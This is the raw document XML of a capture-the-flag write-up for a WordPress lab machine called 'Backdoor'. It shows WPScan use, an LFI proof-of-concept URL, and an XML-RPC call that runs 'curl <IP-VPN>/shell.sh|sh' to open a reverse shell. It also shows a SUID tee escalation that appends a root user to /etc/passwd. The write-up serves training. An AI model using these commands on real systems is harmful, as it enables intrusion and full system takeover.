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BACKDOOR</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27aso2ojcyf"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xslyvcc22nd"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97100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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2qtlfrk911pe"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RCPBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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 we have a CMS (WordPress). Looking at the source code, we can notice a domain → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp.uhclabs.com</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need to map the IP address to the domain name by adding a line to the hosts file, as illustrated in the image.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260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3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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checks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SecLists.)</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-includes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find something interesting → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">class-wp-xmlrpc-server.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Registers all XML-RPC methods, but unfortunately we cannot read it directly.</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5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68iuc89m2wnw" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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263900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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yqro9emhbys1" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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WPScan </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a black-box testing tool used to scan for potential vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">installations and their plugins.</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wpscan --url http://wp.uhclabs.com/ -e ap --plugins-detection aggressive --api-token &lt;TOKEN&gt; -t 200</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tool, we can see that it identified an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the plugin → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Site Editor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52900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Offensive Security's Exploit Database Archive</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Product: Site Editor Wordpress Plugin</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Tested version: 1.1.1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">CVE ID: CVE-2018-7422</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hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/44340</w:t>
        </w:r>
      </w:hyperlink>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z1n0r0vlf4g7" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC</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http://&lt;SITE&gt;/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd</w:t>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Using the Exploit-DB PoC, we can read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0" l="0" r="0" t="0"/>
            <wp:docPr id="7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that we have LFI, we can try to read the file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class-wp-xmlrpc-server.php</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http://wp.uhclabs.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/www/html/wp-includes/class-wp-xmlrpc-server.php</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reading the file, we find something interesting: there is a method called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcommand</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is an alias for →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67200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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tr40w43nknso" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML-RPC Exploitation</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interact using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML-RPC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XML-RPC is a WordPress feature that allows data to be transmitted, with HTTP acting as the transport mechanism and XML as the encoding mechanism. Since WordPress is not a “closed” system and occasionally needs to communicate with other systems, this mechanism was created to handle that work.</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access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/xmlrpc.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and intercept it with Burp Suite, then send a POST request.</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k750u2xr9fho" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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3213100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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5y0ajib82a2" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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attempt to list methods using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.listMethods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://codex.wordpress.org/XML-RPC/system.listMethods</w:t>
        </w:r>
      </w:hyperlink>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6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as we can see, it does not allow listing methods. But since we already know that a method called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcommand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exists, we can interact with it directly.</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the response, we see that it expects a value of type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">string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send:</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&lt;methodCall&gt;</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&lt;methodName&gt;shellcommand&lt;/methodName&gt;</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&lt;params&gt;</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&lt;string&gt;</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&lt;/string&gt;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&lt;/params&gt;</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&lt;/methodCall&gt;</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7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Now we can send a reverse shell payload using curl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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hkoqqsi3mr4x" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.sh</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netcat to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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50kd4q1jlhz6" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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76500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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rpdlvo7437fa" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a Python server to serve our reverse shell file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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send: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&lt;methodCall&gt;</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&lt;methodName&gt;shellcommand&lt;/methodName&gt;</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&lt;params&gt;</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&lt;string&gt;</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curl &lt;IP-VPN&gt;/shell.sh|sh</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&lt;/string&gt;</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&lt;/params&gt;</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&lt;/methodCall&gt;</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7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60">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xl5crgiywvm2" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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vcprv8651v0g" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>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5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retrieve our first flag.</w:t>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8qn8e7o2ofeg" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>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for binaries with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we find the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tee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is a special permission that allows other users to execute a file with the privileges of the file owner.</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Tee</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes data to files and can be used to perform privileged writes or write files outside of a restricted filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Knowing this, we will add a user to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generate a password hash using OpenSSL:</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openssl passwd -1</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6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image, you can see that I assigned:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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UID: 0</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GID: 0</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Home directory: /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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Shell: /bin/bash</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we grant root privileges to our user:</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user:$1$CZG1o8iZ$VZRxQu2xJ35Td9ID/LGsA.:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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write to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LFILE=/etc/passwd</w:t>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'user:&lt;hash&gt;:0:0:root:/root:/bin/bash' | tee -a "$LFILE"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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cat /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that our user has been added.</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29000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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log in with this user and read the final flag =)</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5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9">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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0"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Backdoor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dex.wordpress.org/XML-RPC/system.listMethods" TargetMode="External"/><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17.png"/><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yperlink" Target="https://app.hackingclub.com/training/training-machines/23"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5.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><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24.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/44340" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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6wkrtN9LNBm+qTCUY3Y3Y3Ky6A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLncyN2FzbzJvamN5ZjIOaC5weHNseXZjYzIybmQyDmguMnF0bGZyazkxMXBlMg5oLjY4aXVjODltMndudzIOaC55cXJvOWVtaGJ5czEyDmguejFuMHIwdmxmNGc3Mg5oLnRyNDB3NDNua25zbzIOaC5rNzUwdTJ4cjlmaG8yDmguaDV5MGFqaWI4MmEyMg5oLmhrb3Fxc2kzbXI0eDIOaC41MGtkNHExamxoejYyDmgucnBkbHZvNzQzN2ZhMg5oLnhsNWNyZ2l5d3ZtMjIOaC52Y3Bydjg2NTF2MGcyDmguOHFuOGU3bzJvZmVnMg5oLjE3NWY1Y3M5NHowbzgAciExRmt0akNsSF9fS1lrYWJFV2tkSUs5aHNTOWlYWjk0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